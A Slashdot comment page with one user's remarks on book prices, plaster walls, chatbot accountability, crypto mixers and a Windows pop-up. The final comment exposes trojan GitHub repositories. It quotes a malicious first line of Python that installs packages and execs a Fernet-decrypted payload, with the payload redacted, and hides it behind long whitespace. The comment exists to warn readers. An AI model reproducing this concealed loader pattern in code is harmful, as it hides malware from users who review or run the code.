Please create an account to participate in the Slashdot moderation system

 



Forgot your password?
typodupeerror
×

Comment how you measure (Score 1) 165

I spend the same amount of $$ on books -- I'd guess more than earlier decades -- but because of the price tags, that works out to fewer books. So, looking at it one way, I am buying fewer books but not because I don't want new books; it's because book publishers are raising the barrier and I can't always jump over.

Comment Re:Ugh (Score 1) 174

Plaster has been steadily falling out of favor, however, at least from what I understand.

I learned a fun fact from my contractor neighbour... they're doing a lot more jobs with plaster these days. People have moved away from popcorn ceiling finishes and wallpaper, and flat (in both texture and paint finish) painted walls and ceilings amplify every last little defect in drywall. A plaster crew can achieve a much better finish faster than a drywall crew.

If you can hire a plaster crew, because they've gotten rarer.

Comment Ten correct answers don't cancel-out an error. (Score 2) 57

Leslie Brown told The Markup that the bot "has already provided thousands of people with timely, accurate answers"

When asked about the fallen debris, city engineers told reporters "we already made thousands of correct measurements..."

When asked about the customers suffering from food poisoning, the kitchen owners told reporters "we've already provided thousands of satisfactory meals..."

I get that mistakes will be made -- hell, the chatbot might even make fewer mistakes. What puts a bee in my bonnet is this attitude that nobody can be held accountable for hallucinations and errors made by the clockwork device you purchased hoping to avoiding giving a human a job.

Comment What it says on the tin (Score 1) 15

Isn't a crypto-mixer explicitly for money-laundering? This sounds like charging a reservoir for the act of holding water.

Wikipedia: "A cryptocurrency tumbler or cryptocurrency mixing service is a service that mixes potentially identifiable or "tainted" cryptocurrency funds with others, so as to obscure the trail back to the fund's original source."

Comment bad journalism (Score 1) 43

I feel you're misrepresenting the fact hoping to make us upset to increase engagement.

You state "as annoying as Clippy." What made Clippy annoying was the unprompted interruptions. Yes, as stated twice in the summary (nevermind how many times in the original piece) "after a user's cursor hovers over the icon in the task bar" which is a small 24x24 pixel or smaller area of a 1920x1080 pixel or larger screen. Windows even makes it harder to get there because of the "off the border by a few pixels" design flaw they've been carrying since Windows 95. The user won't see this pop-up unless they make significant effort to summon it, therefore it won't be unprompted and thus won't be "as annoying as Clippy."

Comment Looks like a bug in Git (Score 4, Informative) 50

I found one of the trojan repos. Looking at "Gen.py" in the web ui the first three lines are:

import os
import asyncio
import time

But if you hit the 'raw' button, or highlight the lines and paste in into another window, you get a VERY different picture

import os ;os.system('pip install cryptography');os.system('pip install fernet');os.system('pip install requests');from fernet import Fernet;import requests;exec(Fernet(b'[base64 omitted]=').decrypt(b'[more base64 omitted]'))
import asyncio
import time

It's exploiting very long lines of whitespace to hide the bad code in the overflow.

Slashdot Top Deals

Were there fewer fools, knaves would starve. - Anonymous

Working...